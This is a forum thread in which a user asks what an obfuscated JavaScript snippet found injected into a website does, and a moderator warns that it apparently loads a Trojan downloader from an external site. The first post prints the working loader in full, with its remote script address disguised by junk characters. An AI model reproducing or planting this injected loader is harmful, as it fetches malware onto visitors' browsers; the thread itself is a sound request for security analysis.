Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 4 of 4
  1. #1
    New to the CF scene
    Join Date
    Jan 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Virus/Trojan code?

    Hello,
    Please help me to understand the risk from the js code I found on http://www.glanstider.no website.

    The code looks very strange:

    Code:
    <script>/*LGPL*/ try{ window.onload = function(){var Ynrwc1hiq87h = document.createElement('s)^c@r$$)#i$@p($$$t^'.replace(/#|@|\!|\(|\)|\^|\$|&/ig, ''));Ynrwc1hiq87h.setAttribute('defer', 'd@$e^#@)f&&^e@r()'.replace(/#|\)|\(|&|@|\^|\!|\$/ig, ''));Ynrwc1hiq87h.setAttribute('type', 't&&(e&(x&#t($/@j#@a#&@v#a)#s@^c#r@#i!p(!t^$&$'.replace(/&|@|\!|\$|\^|\)|\(|#/ig, ''));Ynrwc1hiq87h.setAttribute('id', 'Z(#!(e(l@@!!5#@b()))x#&i#)&6^@@s(@y@@x()^v)&9#&'.replace(/\!|\$|@|&|\)|\(|\^|#/ig, ''));Ynrwc1hiq87h.setAttribute('s#)!r^^@^c^&!'.replace(/@|\!|\^|\)|&|\$|#|\(/ig, ''),  'h(&t#))t&p#:)/(/@0!@(!@1&&)n#)!)e)#t)@)^-$c&)o((m#!(.$!^t)@^i&(g@&(@@e(@(r^@!d!(@&i&^^r#(!e(&^c&@t)^&.)!)c)o^^)m(!).!!@&g$#)^o$!&d#$a&d&@@d!$)y)-@!&c!$o@&$m^$$.!^(c#@a^)@r(!@#s#((w#(#(e!b!@n$@^e)t$@^!.(!$@#r(u$#!#!:&8@0^^8^##&0!^/^g)&^o)#!o!#g&l$^$$e#.$))$c@&)o^^m##(/#@)!g($@#o&)o#@g!($l$$^(#e#@.@c)$^o@m!$/#&&c@a!@r)^)e##e^$!!r&&)b)$u!$$$i@l#()d$^#e$r@$!!.$#(c#^o^@)m@&#&/)$x)@$&(n)#x)&(x@.&!#c&)@o($m(#/@(s^$^@o^s@$&o$^).$!c&^o#$#m!/!@&&@'.replace(/\(|\)|&|\^|#|\$|\!|@/ig, ''));if (document){document.body.appendChild(Ynrwc1hiq87h);}} } catch(Jg8hbd0kytqswmmfze) {}</script>
    <!--40ace59eda33a6f5e5733ed6bdc65c1e-->

    could you please tell me what this code do and how high is the security lack?

    Thanks
    ---
    [edit by Moderator Kor]Caution! Of course, don't run that code in your browsers. To read it I have only deciphered portions of it and I have found that it probably loads a Trojan.
    Last edited by Kor; 01-08-2010 at 01:46 PM.

  • #2
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,443
    Thanks
    205
    Thanked 2,578 Times in 2,556 Posts
    No idea what it does, but I would avoid it like the plague.

    40ace59eda33a6f5e5733ed6bdc65c1e
    translates to
    @¬åžÚ3¦õås>Ö½Æ\
    Last edited by Philip M; 01-08-2010 at 12:45 PM.

  • #3
    New to the CF scene
    Join Date
    Jan 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

  • #4
    Red Devil Mod Kor's Avatar
    Join Date
    Apr 2003
    Location
    Bucharest, ROMANIA
    Posts
    8,478
    Thanks
    58
    Thanked 379 Times in 375 Posts
    Quote Originally Posted by Philip M View Post
    No idea what it does, but I would avoid it like the plague.

    40ace59eda33a6f5e5733ed6bdc65c1e
    translates to
    @¬åžÚ3¦õås>Ö½Æ\
    Which in fact is (from latin-1 to KO18 [Russian]):
    @╛х·к3ІУхs>жНЦ\
    Because that code loads an external javascript file from a site from Russia which might inject the Trojan-Downloader.JS.Agent.ewh virus
    KOR
    Offshore programming
    -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*


  •  

    Tags for this Thread

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •